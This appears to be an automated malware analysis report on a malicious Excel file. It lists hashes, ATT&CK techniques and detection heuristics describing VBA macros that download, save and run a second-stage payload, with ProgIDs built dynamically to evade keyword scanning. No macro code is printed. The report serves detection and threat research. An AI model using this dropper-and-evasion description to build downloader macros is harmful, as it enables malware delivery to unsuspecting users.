Office (OLE) / .XLS malware analysis — malicious · 1b213019cb5bf312

MALICIOUS

Office (OLE) / .XLS

84.5 KB Created: 2022-08-09 11:01:09 Authoring application: Microsoft Excel First seen: 2022-08-31

MD5: b4092af9867a42164d2df1a8041ce372 SHA-1: edbd113eee982b3e90a6ba1af825c31a4d05fd55 SHA-256: 1b213019cb5bf3126ab451025c85a5a7f62640660d99b8cb4f5227b86c897927

160 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1105 Ingress Tool Transfer

The critical heuristic OLE_VBA_HTTP_DROP_EXEC indicates that the VBA macros within this XLS file are designed to download a file from the internet and save it to disk. The presence of VBA macros and the specific heuristic strongly suggest a downloader or droppper functionality, aiming to fetch and execute a secondary payload. No specific family could be identified, but the behavior is consistent with common malware delivery techniques.

Heuristics 4

VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC

VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas` `52f68457c7a42f4b6ac3025d01c3b79465fc6131294018141cb45528bc3cf788`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3832 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.